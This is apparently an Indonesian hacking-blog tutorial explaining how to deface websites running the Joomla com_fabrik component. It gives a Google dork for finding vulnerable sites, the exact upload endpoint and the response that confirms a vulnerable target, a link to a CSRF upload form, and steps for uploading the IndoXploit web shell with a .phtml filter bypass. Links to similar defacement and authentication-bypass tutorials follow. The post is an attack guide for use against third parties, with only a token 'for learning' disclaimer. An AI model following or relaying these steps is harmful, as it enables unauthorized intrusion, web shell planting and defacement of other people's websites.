Deface Metode Com_fabrik Upload Shell With CSRF

Deface Metode Com_fabrik Upload Shell With CSRF

Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode Com_fabrik Upload Shell With CSRF

Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja

-Dork

inurl:index.php?option=Com_Fabrik

Kembangin aja agar dapat yg vuln

-Exploit

/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

-CSRF Comot sini Senpai

https://pastebin.com/raw/FqSRiu1R

1. Dorking dulu di google (Gunakan otak kalian agar dapat yg vuln)

2. Jika sudah masukkan exploit di atas seperti ini
site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Jika Vuln akan ada seperti ini

{"filepath":null,"uri":null}

3. Ambil CSRF di atas dan edit di bagian site. Ganti menjadi target kalian kemudian save dengan format html

4. Buka CSRF tadi menggunakan browser seperti google atau apalah

5. Upload shel kalian

Upload shel harus bypass menjadi phtml, di sini saya hanya mengupload script deface saja
6. Jika work akan ada seperti ini, tinggal kalian akses aja

7. TADAA

Mungkin itulah sedikit penjelasan mengenai "Deface Metode Com_fabrik Upload Shell With CSRF"
Jika kurang paham kalian bisa bertanya di bawah ini

Jika kurang paham nonton aja video di bawah ini

Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb

Adewakun

Deface Metode Com_fabrik Upload Shell With CSRF

Post a Comment

Cara mencari Sebuah akses Shell atau Backdoor pada suatu web menggunakan Acunetik

Deface Metode Add Buku Tamu dan JS Overvlay (JSO)

Deface Metode JSO Atau JS Overvlay (Menutup Halaman Depan)

WordPress Plugin Userpro - Authentication Bypass

Deface Metode TinyMCE 4 Image Manager With CSRF